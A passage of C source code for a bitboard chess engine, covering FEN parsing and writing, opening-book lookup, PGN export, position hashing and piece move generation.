strchr(nextFenField, ' ') + 1;\n//other side turn and position\n\tif (*nextFenField == '-') {\n\t\tposition->epSquare = -1;\n\t} else {\n\t\tposition->epSquare = str2index(nextFenField);\n\t}\n\n\t// ===== HALF MOVE CLOCK =====\n\tif (!strchr(nextFenField, ' ')) {\n\t\tposition->halfmoveClock = 0;\n\t\tposition->fullmoveNumber = 1;\n\t\treturn 1+nextFenField-fen;\n\t}\n\tnextFenField = strchr(nextFenField, ' ') + 1;\n // Now the capture/pawn halfmove clock:\n\tposition->halfmoveClock = atoi(nextFenField);\n\n\t// ===== FULL MOVE NUMBER =====\n\tif (!strchr(nextFenField, ' ')) {\n\t\tposition->fullmoveNumber = 0;\n\t\treturn 1+nextFenField-fen;\n\t}\n\tnextFenField = strchr(nextFenField, ' ') + 1;\n// Finally, the fullmove counter:\n\tposition->fullmoveNumber = atoi(nextFenField);\n\n\treturn 1+nextFenField-fen;\n}\n\nint toFen(char * fen, Position * position) {\n\tint charCount = toMinFen(fen, position);\n\tfen[charCount-1] = ' ';\n\n\t// ===== HALF MOVE CLOCK =====\n\tsnprintf(&fen[charCount++], 2, \"%d\", position->halfmoveClock);\n\tif (position->halfmoveClock >= 10) {\n\t\tcharCount++;\n\t\tif (position->halfmoveClock >= 100) {\n\t\t\tcharCount++;\n\t\t}\n\t}\n\tfen[charCount++] = ' ';\n\n\t// ===== FULL MOVE NUMBER =====\n\tsnprintf(&fen[charCount++], 2, \"%d\", position->fullmoveNumber);\n\tif (position->fullmoveNumber >= 10) {\n\t\tcharCount++;\n\t\tif (position->fullmoveNumber >= 100) {\n\t\t\tcharCount++;\n\t\t}\n\t}\n\tfen[charCount++] = '\\0';\n\n\treturn charCount;\n}\n//This function is for the board position.\nint toMinFen(char * fen, Position * position) {\n\tint charCount = 0;\n\n\t// ===== BOARD =====\n\tint rank = 7;\n\tint file = 0;\n\tint emptySquares = 0;\n//keep looping until rank is grater or equal to 0\n\twhile(rank >= 0) {\n\t\tint piece = position->board[8*rank+file];\n\n\t\tif ( piece == EMPTY ) {\n\t\t\temptySquares++; //add one to the emptySquares \n\t\t} else {\n\t\t\tif (emptySquares != 0) { //if is is nor an enmtySquares\n\t\t\t snprintf(&fen[charCount++], 2, \"%d\", emptySquares);\n\t\t\t\temptySquares = 0;\n\t\t\t}\n\t\t\tfen[charCount++] = piece2char(piece);\n\t\t}\n\n\t\tfile++;\n\t\tif ( file > 7 ) {\n\t\t\tif (emptySquares != 0) {\n\t\t\t snprintf(&fen[charCount++], 2, \"%d\", emptySquares);\n\t\t\t\temptySquares = 0;\n\t\t\t}\n\t\t\tfile = 0;\n\t\t\trank--;\n\t\t\tfen[charCount++] = '/';\n\t\t}\n\t}\n\tfen[charCount-1] = ' ';\n\n\n\t// ===== TO MOVE =====\n\tif (position->toMove == BLACK) {\n\t\tfen[charCount++] = 'b';\n\t} else {\n\t\tfen[charCount++] = 'w';\n\t}\n\tfen[charCount++] = ' ';\n\n\t// ===== CASTLING RIGHTS =====\n\tif (position->castlingRights == 0) {\n\t\t\tfen[charCount++] = '-';\n\t} else {\n\t\tif (position->castlingRights & CASTLE_KINGSIDE_WHITE) {\n\t\t\tfen[charCount++] = 'K';\n\t\t}\n\t\tif (position->castlingRights & CASTLE_QUEENSIDE_WHITE) {\n\t\t\tfen[charCount++] = 'Q';\n\t\t}\n\t\tif (position->castlingRights & CASTLE_KINGSIDE_BLACK) {\n\t\t\tfen[charCount++] = 'k';\n\t\t}\n\t\tif (position->castlingRights & CASTLE_QUEENSIDE_BLACK) {\n\t\t\tfen[charCount++] = 'q';\n\t\t}\n\t}\n\tfen[charCount++] = ' ';\n\n\t// ===== EN PASSANT =====\n\tif (position->epSquare == -1) {\n\t\t\tfen[charCount++] = '-';\n\t} else {\n\t\tfen[charCount++] = getFile(position->epSquare);\n\t\tfen[charCount++] = getRank(position->epSquare);\n\t}\n\tfen[charCount++] = '\\0';\n\n\treturn charCount;\n}\n\n// ========= UTILITY =========\nBOOL fromInitial(Game * game) {\n\tif ( strcmp(game->positionHistory[0], INITIAL_FEN) == 0 )\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\nBitboard index2bb(int index) {\n\tBitboard bb = 1;\n\treturn bb << index;\n}\n\nint str2index(char *str) {\n\tint i, file_num=0, rank_num=0;\n\tfor(i=0; i<8; i++) {\n\t\tif ( str[0] == FILES[i] )\n\t\t\tfile_num = i;\n\t\tif ( str[1] == RANKS[i] )\n\t\t\trank_num = i;\n\t}\n\treturn 8*rank_num + file_num;\n}\n\nBitboard str2bb(char *str) {\n\treturn index2bb(str2index(str));\n}\n//Boolean checker for available positions\nBOOL isSet(Bitboard bb, int index) {\n\tif (bb & index2bb(index))\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n//This function to check the number of Squares \nBitboard lsb(Bitboard bb) {\n\tint i;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tBitboard bit = index2bb(i);\n\t\tif (bb & bit)\n\t\t\treturn bit;\n\t}\n\treturn 0;\n}\n//This will return the number of squares in the game\nBitboard msb(Bitboard bb) {\n\tint i;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tBitboard bit = index2bb(63-i);\n\t\tif (bb & bit)\n\t\t\treturn bit;\n\t}\n\treturn 0;\n}\n//This function is for the index of the bitBoard.\nint bb2index(Bitboard bb) {\n\tint i;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tBitboard bit = index2bb(i);\n\t\tif (bb & bit)\n\t\t\treturn i;\n\t}\n\treturn -1;\n}\n//This is the movement list for the game \nchar * movelist2str(Game * game) {\n\tchar * movestr = NULL;\n\n\tif (game->moveListLen == 0) {\n\t\tmovestr = (char*) malloc(sizeof(char));\n\t\tmovestr[0] = 0;\n\t\treturn movestr;\n\t}\n\n\tmovestr = (char*) malloc (5*game->moveListLen);\n\n\tint i;\n\tfor (i=0;i<game->moveListLen;i++) {\n\t\tint leaving = getFrom(game->moveList[i]);\n\t\tint arriving = getTo(game->moveList[i]);\n\t\tmovestr[5*i] = getFile(leaving);\n\t\tmovestr[5*i+1] = getRank(leaving);\n\t\tmovestr[5*i+2] = getFile(arriving);\n\t\tmovestr[5*i+3] = getRank(arriving);\n\t\tmovestr[5*i+4] = ' ';\n\t}\n\n\tmovestr[5*game->moveListLen-1] = 0;\n\n\treturn movestr;\n}\n// This function will have the last move in the game\nMove getLastMove(Game * game) {\n\tif (game->moveListLen == 0)\n\t\treturn 0;\n\telse\n\t\treturn game->moveList[game->moveListLen-1];\n}\n//This function to has the start of the game\nBOOL startsWith(const char *str, const char *pre) {\n size_t lenpre = strlen(pre), lenstr = strlen(str);\n\n if (lenpre > lenstr)\n \treturn FALSE;\n\n return strncmp(pre, str, lenpre) == 0 ? TRUE : FALSE;\n}\n//This function will read from a file names book.txt \nint countBookOccurrences(Game * game) {\n FILE * fp = fopen(\"book.txt\", \"r\");\n\n if (fp == NULL)\n return 0;\n\n char * moveList = movelist2str(game);\n char *line = (char *) malloc(sizeof(char) * MAX_BOOK_ENTRY_LEN);\n int charPos = 0, occurrences = 0;\n\n while (TRUE) {\n\t\tchar ch = getc(fp);\n\t\tline[charPos++] = ch;\n\n\t\tif ( ch == '\\n' || ch == EOF ) {\n\t\t\tline[charPos-1] = '\\0';\n\n\t\t\tif (startsWith(line, moveList) && strlen(line) > strlen(moveList)) {\n\t\t\t\toccurrences++;\n\t\t\t}\n\n\t\t\tif ( ch == EOF )\n\t\t\t\tbreak;\n\n\t\t\tcharPos = 0;\n\t\t}\n }\n\n fclose(fp);\n free(line);\n free(moveList);\n\n return occurrences;\n}\n// This function will check for the possibilities of the movement\nMove getBookMove(Game * game) {\n\tMove move = 0;\n\tint moveNum = rand() % countBookOccurrences(game);\n\n\tFILE * fp = fopen(\"book.txt\", \"r\");\n\n\tif (fp == NULL)\n\t\treturn 0;\n\n\tchar * moveList = movelist2str(game);\n\tchar *line = (char *) malloc(sizeof(char) * MAX_BOOK_ENTRY_LEN);\n\tint charPos = 0, occurrences = 0;\n\n\twhile (TRUE) {\n\t\tchar ch = getc(fp);\n\t\tline[charPos++] = ch;\n\n\t\tif ( ch == '\\n' ) {\n\t\t\tline[charPos] = '\\0';\n\n\t\t\tif (startsWith(line, moveList)) {\n\t\t\t\tif ( occurrences == moveNum ) {\n\t\t\t\t\tint ind = game->moveListLen*5;\n\t\t\t\t\tmove = parseMove(&line[ind]);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\toccurrences++;\n\t\t\t}\n\n\t\t\tcharPos = 0;\n\t\t}\n\t}\n\n\tfclose(fp);\n\tfree(line);\n\tfree(moveList);\n\n\treturn move;\n}\n\nchar getFile(int position) {\n\tint file = position%8;\n\treturn FILES[file];\n}\n\nchar getRank(int position) {\n\tint rank = (int) (position/8);\n\treturn RANKS[rank];\n}\n//this function is used to genera moves in the game\nMove generateMove(int leavingSquare, int arrivingSquare) {\n\tint leaving = (leavingSquare << 8);\n\tint arriving = arrivingSquare;\n\treturn (Move) (leaving + arriving);\n}\n\nint getFrom(Move move) {\n\treturn (move >> 8) & 0xFF;\n}\n//for movements\nint getTo(Move move) {\n\treturn move & 0xFF;\n}\n\nint char2piece(char pieceCode) {\n\tswitch(pieceCode) {\n\tcase 'P':\n\t\treturn WHITE|PAWN;\n\tcase 'N':\n\t\treturn WHITE|KNIGHT;\n\tcase 'B':\n\t\treturn WHITE|BISHOP;\n\tcase 'R':\n\t\treturn WHITE|ROOK;\n\tcase 'Q':\n\t\treturn WHITE|QUEEN;\n\tcase 'K':\n\t\treturn WHITE|KING;\n\n\tcase 'p':\n\t\treturn BLACK|PAWN;\n\tcase 'n':\n\t\treturn BLACK|KNIGHT;\n\tcase 'b':\n\t\treturn BLACK|BISHOP;\n\tcase 'r':\n\t\treturn BLACK|ROOK;\n\tcase 'q':\n\t\treturn BLACK|QUEEN;\n\tcase 'k':\n\t\treturn BLACK|KING;\n\t}\n\treturn 0;\n}\n//switch statement to check the input from the user \nchar piece2char(int piece) {\n\tswitch(piece) {\n\tcase WHITE|PAWN:\n\t\treturn 'P';\n\tcase WHITE|KNIGHT:\n\t\treturn 'N';\n\tcase WHITE|BISHOP:\n\t\treturn 'B';\n\tcase WHITE|ROOK:\n\t\treturn 'R';\n\tcase WHITE|QUEEN:\n\t\treturn 'Q';\n\tcase WHITE|KING:\n\t\treturn 'K';\n\tcase BLACK|PAWN:\n\t\treturn 'p';\n\tcase BLACK|KNIGHT:\n\t\treturn 'n';\n\tcase BLACK|BISHOP:\n\t\treturn 'b';\n\tcase BLACK|ROOK:\n\t\treturn 'r';\n\tcase BLACK|QUEEN:\n\t\treturn 'q';\n\tcase BLACK|KING:\n\t\treturn 'k';\n\tcase EMPTY:\n\t\treturn '.';\n\t}\n\treturn 0;\n}\n// switch statement to check the specified piece \nchar * piece2str(int piece) {\n\tswitch(piece&PIECE_MASK) {\n\tcase PAWN:\n\t\treturn \"Pawn\";\n\tcase KNIGHT:\n\t\treturn \"Knight\";\n\tcase BISHOP:\n\t\treturn \"Bishop\";\n\tcase ROOK:\n\t\treturn \"Rook\";\n\tcase QUEEN:\n\t\treturn \"Queen\";\n\tcase KING:\n\t\treturn \"King\";\n\tcase EMPTY:\n\t\treturn \"none\";\n\t}\n\treturn \"\";\n}\n//to print the bit board for the game\nvoid printBitboard(Bitboard bitboard) {\n\tint rank, file;\n\n\tprintf(\"\\n\");\n\tfor (rank=0; rank<8; rank++) {\n\t\tprintf(\"%d\", 8-rank);\n\t\tfor (file=0; file<8; file++) {\n\t\t\tif ( bitboard>>(file + (7-rank)*8) & 1 ) {\n\t\t\t\tprintf(\" #\");\n\t\t\t} else {\n\t\t\t\tprintf(\" .\");\n\t\t\t}\n\t\t}\n\t\tprintf(\"\\n\");\n\t}\n\tprintf(\" a b c d e f g h\\n\");\n\tfflush(stdout);\n}\n//This print statement for the bord of the chess game\nvoid printBoard(int board[]) {\n\tint rank, file;\n\n\tprintf(\"\\n\");\n\tfor (rank=0; rank<8; rank++) {\n\t\tprintf(\"%d\", 8-rank);\n\t\tfor (file=0; file<8; file++) {\n\t\t\tint position = file + (7-rank)*8;\n\t\t\tprintf(\" %c\", piece2char(board[position]));\n\t\t}\n\t\tprintf(\"\\n\");\n\t}\n\tprintf(\" a b c d e f g h\\n\");\n\tfflush(stdout);\n}\n//To print the pices positions\nvoid printGame(Game * game) {\n\tprintf(\"Game -> %p (%lu)\", game, sizeof(*game));\n\tprintBoard(game->position.board);\n\tprintf(\"board -> %p (%lu)\\n\", game->position.board, sizeof(game->position.board));\n\tprintf(\"toMove = %d -> %p (%lu)\\n\", game->position.toMove, &game->position.toMove, sizeof(game->position.toMove));\n\tprintf(\"ep = %d -> %p (%lu)\\n\", game->position.epSquare, &game->position.epSquare, sizeof(game->position.epSquare));\n\tprintf(\"castle rights = %d -> %p (%lu)\\n\", game->position.castlingRights, &game->position.castlingRights, sizeof(game->position.castlingRights));\n\tprintf(\"half clock = %d -> %p (%lu)\\n\", game->position.halfmoveClock, &game->position.halfmoveClock, sizeof(game->position.halfmoveClock));\n\tprintf(\"full num = %d -> %p (%lu)\\n\", game->position.fullmoveNumber, &game->position.fullmoveNumber, sizeof(game->position.fullmoveNumber));\n\n\tprintf(\"moveListLen = %d -> %p (%lu)\\n\", game->moveListLen, &game->moveListLen, sizeof(game->moveListLen));\n\tprintf(\"moveList -> %p (%lu)\\n\", game->moveList, sizeof(game->moveList));\n\tprintf(\"positionHistory -> %p (%lu)\\n\", game->positionHistory, sizeof(game->positionHistory));\n\tfflush(stdout);\n}\n\nBitboard not(Bitboard bb) {\n\treturn ~bb & ALL_SQUARES;\n}\n//switch between colors \nchar opponent(char color) {\n\tswitch(color) {\n\tcase WHITE:\n\t\treturn BLACK;\n\tcase BLACK:\n\t\treturn WHITE;\n\t}\n\treturn -1;\n}\n// cont the number of bits\nint countBits(Bitboard bb) {\n\tint i, bitCount = 0;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tif (index2bb(i) & bb)\n\t\t\tbitCount++;\n\t}\n\treturn bitCount;\n}\n\nvoid sortNodes(Node * sortedNodes, Node * nodes, int len, char color) {\n\tNode nodeBuffer[len];\n\n\tint i, j;\n\tBOOL sorted;\n\tfor (i=0; i<len; i++) {\n\t\tsorted = FALSE;\n\n\t\tfor (j=0; j<i; j++) {\n\t\t\tif ( (color == WHITE && nodes[i].score > sortedNodes[j].score) ||\n\t\t\t\t (color == BLACK && nodes[i].score < sortedNodes[j].score) ) {\n\t\t\t\tsorted = TRUE;\n\t\t\t\tmemcpy(nodeBuffer, &sortedNodes[j], (i-j)*sizeof(Node));\n\t\t\t\tmemcpy(&sortedNodes[j+1], nodeBuffer, (i-j)*sizeof(Node));\n\t\t\t\tsortedNodes[j] = nodes[i];\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\tif ( sorted == FALSE ) {\n\t\t\tsortedNodes[i] = nodes[i];\n\t\t}\n\t}\n}\n//This function will print the moves in the game\nvoid printMove(Move move) {\n\tprintf(\"%c%c to %c%c\", getFile(getFrom(move)), getRank(getFrom(move)), getFile(getTo(move)), getRank(getTo(move)));\n}\n//This function will print the full moves of the game\nvoid printFullMove(Move move, int board[]) {\n\tint from = getFrom(move);\n\tint piece = board[from];\n\tprintf(\"%s from \", piece2str(piece));\n\tprintMove(move);\n}\n//This function will print the legal moves of the game\nvoid printLegalMoves(Position * position) {\n\tint i;\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint moveCount = legalMoves(moves, position, position->toMove);\n\tfor (i=0; i<moveCount; i++) {\n\t\tprintf(\"%2d. \", i+1);\n\t\tprintFullMove(moves[i], position->board);\n//\t\tprintMove(moves[i]);\n\t\tprintf(\"\\n\");\n\t}\n\tfflush(stdout);\n}\n\nvoid printNode(Node node) {\n\tprintMove(node.move);\n\tprintf(\": %d\", node.score);\n}\n//This function is for the time in the game\nvoid getTimestamp(char * timestamp) {\n time_t timer;\n struct tm* tm_info;\n\n time(&timer);\n tm_info = localtime(&timer);\n\n strftime(timestamp, 20, \"%Y-%m-%d_%H.%M.%S\", tm_info);\n}\n\nvoid dumpContent(Game * game) {\n\tchar * movelist = movelist2str(game);\n\n\tchar filename[50];\n\tsprintf(filename, \"chess_game_\");\n\tgetTimestamp(&filename[strlen(filename)]);\n\tsprintf(&filename[strlen(filename)], \".txt\");\n\n\tFILE * file = fopen(filename, \"w+\");\n\n\tfprintf(file, \"movelist = %s\\nposition history:\\n\", movelist);\n\n\tint i;\n\tfor (i=0; i<game->moveListLen+1; i++)\n\t\tfprintf(file, \"%s\\n\", game->positionHistory[i]);\n\n\tfree(movelist);\n\tfclose(file);\n\n\tprintf(\"Dumped game content to: %s\\n\", filename);\n\tfflush(stdout);\n}\n\nvoid dumpPGN(Game * game, char color, BOOL hasAI) {\n\tchar filename[50];\n\tsprintf(filename, \"chess_game_\");\n\tgetTimestamp(&filename[strlen(filename)]);\n\tsprintf(&filename[strlen(filename)], \".pgn\");\n\n\tFILE * file = fopen(filename, \"w+\");\n\n\tchar date[12];\n time_t timer;\n struct tm* tm_info;\n time(&timer);\n tm_info = localtime(&timer);\n strftime(date, 11, \"%Y.%m.%d\", tm_info);\n\n\n\tfprintf(file, \"[Event \\\"Casual Game\\\"]\\n\");\n\tfprintf(file, \"[Site \\\"?\\\"]\\n\");\n\tfprintf(file, \"[Date \\\"%s\\\"]\\n\", date);\n\tfprintf(file, \"[Round \\\"-\\\"]\\n\");\n\n\tif ( hasAI ) {\n\t\tif ( color == WHITE ) {\n\t\t\tfprintf(file, \"[White \\\"%s\\\"]\\n\", HUMAN_NAME);\n\t\t\tfprintf(file, \"[Black \\\"%s\\\"]\\n\", ENGINE_NAME);\n\t\t} else {\n\t\t\tfprintf(file, \"[White \\\"%s\\\"]\\n\", ENGINE_NAME);\n\t\t\tfprintf(file, \"[Black \\\"%s\\\"]\\n\", HUMAN_NAME);\n\t\t}\n\t} else {\n\t\tfprintf(file, \"[White \\\"Unknown Human Player\\\"]\\n\");\n\t\tfprintf(file, \"[Black \\\"Unknown Human Player\\\"]\\n\");\n\t}\n\n\tif ( hasGameEnded(&game->position) ) {\n\t\tif ( endNodeEvaluation(&game->position) == winScore(WHITE) ) {\n\t\t\tfprintf(file, \"[Result \\\"1-0\\\"]\\n\");\n\t\t} else if ( endNodeEvaluation(&game->position) == winScore(BLACK) ) {\n\t\t\tfprintf(file, \"[Result \\\"0-1\\\"]\\n\");\n\t\t} else if ( endNodeEvaluation(&game->position) == 0 ) {\n\t\t\tfprintf(file, \"[Result \\\"1/2-1/2\\\"]\\n\");\n\t\t}\n\t} else {\n\t\tfprintf(file, \"[Result \\\"*\\\"]\\n\");\n\t}\n\n\tif ( strcmp(game->positionHistory[0], INITIAL_FEN) == 0) {\n\t\tfprintf(file, \"[Variant \\\"Standard\\\"]\\n\");\n\t} else {\n\t\tfprintf(file, \"[Variant \\\"From Position\\\"]\\n\");\n\t\tfprintf(file, \"[FEN \\\"%s\\\"]\\n\", game->positionHistory[0]);\n\t}\n\n\tfprintf(file, \"[PlyCount \\\"%d\\\"]\\n\\n\", game->moveListLen);\n\n\n\tint i;\n\tchar ply[8];\n\tfor (i=0;i<game->moveListLen;i++) {\n\t\tif (i%2==0) fprintf(file, \"%d. \", 1+(i/2));\n\t\tmove2str(ply, game, i);\n\t\tfprintf(file, \"%s \", ply);\n\t}\n\n\tfclose(file);\n\n\tprintf(\"Dumped game pgn to: %s\\n\", filename);\n\tfflush(stdout);\n}\n//This will take care of the movement during the game\nvoid move2str(char * str, Game * game, int moveNumber) { // TODO: refactor\n\tPosition posBefore, posAfter;\n\tloadFen(&posBefore, game->positionHistory[moveNumber]);\n\tloadFen(&posAfter, game->positionHistory[moveNumber+1]);\n\tMove move = game->moveList[moveNumber];\n\tint leavingSquare = getFrom(move);\n\tint arrivingSquare = getTo(move);\n\tint movingPiece = posBefore.board[leavingSquare];\n\tint capturedPiece = posBefore.board[arrivingSquare];\n\n\tint length = 0;\n\tif ( (movingPiece&PIECE_MASK) == KING && abs(leavingSquare-arrivingSquare) == 2 ) { // if castling\n\t\tif ( index2bb(arrivingSquare)&FILE_G ) {\n\t\t\tsprintf(str, \"O-O\");\n\t\t\tlength += 3;\n\t\t} else if ( index2bb(arrivingSquare)&FILE_C ) {\n\t\t\tsprintf(str, \"O-O-O\");\n\t\t\tlength += 5;\n\t\t}\n\t} else { // if not castling\n\t\tif ( (movingPiece&PIECE_MASK) == PAWN ) {\n\t\t\tif ( capturedPiece != EMPTY ) {\n\t\t\t\tstr[length++] = getFile(leavingSquare);\n\t\t\t}\n\t\t} else {\n\t\t\tstr[length++] = piece2char(movingPiece&PIECE_MASK);\n\t\t}\n\n\t\tif( isAmbiguous(&posBefore, move) ) {\n\t\t\tif ( countBits( getColoredPieces(posBefore.board, movingPiece&COLOR_MASK)&getPieces(posBefore.board, movingPiece&PIECE_MASK)&fileFilter(index2bb(leavingSquare)) ) == 1 ) {\n\t\t\t\tstr[length++] = getFile(leavingSquare);\n\t\t\t} else {\n\t\t\t\tstr[length++] = getRank(leavingSquare);\n\t\t\t}\n\t\t}\n\n\t\tif ( capturedPiece != EMPTY ) {\n\t\t\tstr[length++] = 'x';\n\t\t}\n\n\t\tstr[length++] = getFile(arrivingSquare);\n\t\tstr[length++] = getRank(arrivingSquare);\n\t}\n\n\tif ( isCheckmate(&posAfter) ) {\n\t\tstr[length++] = '#';\n\t} else if (isCheck(posAfter.board, posAfter.toMove)) {\n\t\tstr[length++] = '+';\n\t}\n\n\tstr[length++] = 0;\n}\n\nBOOL isAmbiguous(Position * posBefore, Move move) {\n\tint i, attackCount = 0;\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint moveCount = legalMoves(moves, posBefore, posBefore->toMove);\n\n\tfor (i=0; i<moveCount; i++) {\n\t\tif ( getTo(moves[i]) == getTo(move) &&\n\t\t\t\tposBefore->board[getFrom(moves[i])] == posBefore->board[getFrom(move)] ) {\n\t\t\tattackCount++;\n\t\t}\n\t}\n\n\treturn attackCount > 1;\n}\n\nunsigned long hashPosition(Position * position) {\n\tchar fen[MAX_FEN_LEN];\n\ttoMinFen(fen, position);\n\n unsigned long hash = 5381;\n int c, i=0;\n\n while ((c = fen[i++])) {\n \thash = ((hash << 5) + hash) + c;\n }\n\n return hash;\n}\n//This to read from the file\nvoid writeToHashFile(Position * position, int evaluation, int depth) {\n FILE * fp = fopen(\"hashfile\", \"a\");\n\n if (fp == NULL)\n return;\n\n char fen[MAX_FEN_LEN];\n toMinFen(fen, position);\n\n fprintf(fp, \"%08lx %d %d %s\\n\", hashPosition(position), depth, evaluation, fen);\n fclose(fp);\n}\n\n// ====== BOARD FILTERS ======\n\nBitboard getColoredPieces(int board[], char color) {\n\tint i;\n\tBitboard colored_squares = 0;\n\n\tfor (i=0; i<NUM_SQUARES; i++)\n\t\tif (board[i] != EMPTY && (board[i]&COLOR_MASK) == color)\n\t\t\tcolored_squares |= index2bb(i);\n\n\treturn colored_squares;\n}\n//This function to make ure there are empty squares\nBitboard getEmptySquares(int board[]) {\n\tint i;\n\tBitboard empty_squares = 0;\n\n\tfor (i=0; i<NUM_SQUARES; i++)\n\t\tif (board[i] == EMPTY)\n\t\t\tempty_squares |= index2bb(i);\n\n\treturn empty_squares;\n}\n\nBitboard getOccupiedSquares(int board[]) {\n\treturn not(getEmptySquares(board));\n}\n//This function will get the pieces of the game\nBitboard getPieces(int board[], int pieceType) {\n\tint i;\n\tBitboard pieces = 0;\n\n\tfor (i=0; i<NUM_SQUARES; i++)\n\t\tif ((board[i]&PIECE_MASK) == pieceType)\n\t\t\tpieces |= index2bb(i);\n\n\treturn pieces;\n}\n\nBitboard fileFilter(Bitboard positions) {\n\tBitboard filter = 0;\n\tint i;\n\n\tfor (i=0; i<8; i++)\n\t\tif (positions&FILES_BB[i])\n\t\t\tfilter |= FILES_BB[i];\n\treturn filter;\n}\n\nBitboard rankFilter(Bitboard positions) {\n\tBitboard filter = 0;\n\tint i;\n\n\tfor (i=0; i<8; i++)\n\t\tif (positions&RANKS_BB[i])\n\t\t\tfilter |= RANKS_BB[i];\n\treturn filter;\n}\n//the number of pieces in the game\nchar countPieces(Bitboard bitboard) {\n\tint i, count=0;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tif (index2bb(i)&bitboard)\n\t\t\tcount += 1;\n\t}\n return count;\n}\n\n// ==============================================================\n// \t\t\t\t\t========= DIRECTIONS ==========\n// ==============================================================\n\n// Shifts entire bitboard to the east\nBitboard east(Bitboard bb) {\n\t// Shift bitboard to the right, nullify far left column\n return (bb << 1) & not(FILE_A);\n}\n\n// Shifts entire bitboard to the west\nBitboard west(Bitboard bb) {\n\t// Shift bitboard to the left, nullify far right column\n return (bb >> 1) & not(FILE_H);\n}\n\n// Shifts entire bitboard to the north\nBitboard north(Bitboard bb) {\n\t// Shift bitboard north, nullify bottommost row\n return (bb << 8) & not(RANK_1);\n}\n\n// Shifts entire bitboard to the south\nBitboard south(Bitboard bb) {\n\t// Shift bitboard south, nullify topmost row\n return (bb >> 8) & not(RANK_8);\n}\n\n// Combinations of the above to get NE, SE, NW, SW movements\n\nBitboard NE(Bitboard bb) {\n return north(east(bb));\n}\n\nBitboard NW(Bitboard bb) {\n return north(west(bb));\n}\n\nBitboard SE(Bitboard bb) {\n return south(east(bb));\n}\n\nBitboard SW(Bitboard bb) {\n return south(west(bb));\n}\n\n// Knight movements\n\nBitboard WNW(Bitboard moving_piece) {\n\t// Move bitboard two spaces west and one space north, nullify 2 right and 1 bottom\n return moving_piece << 6 & not(FILE_G | FILE_H | RANK_1);\n}\n\nBitboard ENE(Bitboard moving_piece) {\n\t// Move bitboard two spaces east and one space north, nullify 2 left and 1 bottom\n return moving_piece << 10 & not(FILE_A | FILE_B | RANK_1);\n}\n\nBitboard NNW(Bitboard moving_piece) {\n\t// Move bitboard two spaces north and one space west, nullify 2 bottom and 1 right\n return moving_piece << 15 & not(FILE_H | RANK_1 | RANK_2);\n}\n\nBitboard NNE(Bitboard moving_piece) {\n\t// Move bitboard two spaces north and one space east, nullify 2 bottom and 1 left\n return moving_piece << 17 & not(FILE_A | RANK_1 | RANK_2);\n}\n\nBitboard ESE(Bitboard moving_piece) {\n\t// Move bitboard two spaces east and one space south, nullify 2 right and 1 top\n return moving_piece >> 6 & not(FILE_A | FILE_B | RANK_8);\n}\n\nBitboard WSW(Bitboard moving_piece) {\n\t// Move bitboard two spaces west and one space south, nullify 2 left and 1 top\n return moving_piece >> 10 & not(FILE_G | FILE_H | RANK_8);\n}\n\nBitboard SSE(Bitboard moving_piece) {\n\t// Move bitboard two spaces south and one space east, nullify 2 top and 1 left\n return moving_piece >> 15 & not(FILE_A | RANK_7 | RANK_8);\n}\n\nBitboard SSW(Bitboard moving_piece) {\n\t// Move bitboard two spaces south and one space west, nullify 2 top and 1 right\n return moving_piece >> 17 & not(FILE_H | RANK_7 | RANK_8);\n}\n\n// ==============================================================\n// \t\t\t\t\t========= PIECES ==========\n// ==============================================================\n\n// ========== PAWN ===========\n\n// Retrieves all of the pawns on the board as a bitboard\nBitboard getPawns(int board[]) { return getPieces(board, PAWN); }\n\n// Moves pawn one space forward\nBitboard pawnSimplePushes(Bitboard moving_piece, int board[], char color) {\n\tswitch(color) {\n\tcase WHITE:\n\t\t// Bitwise and between the piece movement and empty squares\n\t\treturn north(moving_piece) & getEmptySquares(board);\n\tcase BLACK:\n\t\t// Bitwise and between the piece movement and empty squares\n\t\treturn south(moving_piece) & getEmptySquares(board);\n\t}\n\treturn 0;\n}\n\n// Moves pawn 2 spaces forward\nBitboard pawnDoublePushes(Bitboard moving_piece, int board[], char color) {\n\tswitch(color) {\n\tcase WHITE:\n\t\t// Bitwise and between the piece movement and empty squares\n\t\treturn north(pawnSimplePushes(moving_piece, board, color)) & (getEmptySquares(board) & RANK_4);\n\tcase BLACK:\n\t\t// Bitwise and between the piece movement and empty squares\n\t\treturn south(pawnSimplePushes(moving_piece, board, color)) & (getEmptySquares(board) & RANK_5);\n\t}\n\treturn 0;\n}\n\n// Returns bitwise or of moving pawn one or two space forward\nBitboard pawnPushes(Bitboard moving_piece, int board[], char color) {\n\treturn pawnSimplePushes(moving_piece, board, color) | pawnDoublePushes(moving_piece, board, color);\n}\n\n// Attacks with pawn moving east\nBitboard pawnEastAttacks(Bitboard moving_piece, int board[], char color) {\n\tswitch(color) {\n\tcase WHITE:\n\t\t// White comes from south, therefore moves northeast\n return NE(moving_piece);\n\tcase BLACK:\n\t\t// Black comes from north, therefore moves southeast\n return SE(moving_piece);\n\t}\n\treturn 0;\n}\n\n// Attacks with pawn moving west\nBitboard pawnWestAttacks(Bitboard moving_piece, int board[], char color) {\n\tswitch(color) {\n\tcase WHITE:\n\t\t// White comes from south, therefore moves northeast\n return NW(moving_piece);\n\tcase BLACK:\n\t\t// Black comes from north, therefore moves southeast\n return SW(moving_piece);\n\t}\n\treturn 0;\n}\n\n// Returns bitwise or of attacking east and west with pawn\nBitboard pawnAttacks(Bitboard moving_piece, int board[], char color) {\n\treturn pawnEastAttacks(moving_piece, board, color) | pawnWestAttacks(moving_piece, board, color);\n}\n\n// Captures with pawn\nBitboard pawnSimpleCaptures(Bitboard moving_piece, int board[], char color) {\n\t// Bitwise and between the pawn movement and the retrieval of colored pieces from the board\n\treturn pawnAttacks(moving_piece, board, color) & getColoredPieces(board, opponent(color));\n}\n\n// Checks to see if the \"En passant\" maneuver is a valid move\nBitboard pawnEpCaptures(Bitboard moving_piece, Position * position, char color) {\n\t// If the en passant square does not exist, return 0\n\tif (position->epSquare == -1)\n\t\treturn 0;\n\n\tBitboard valid_ep_square = 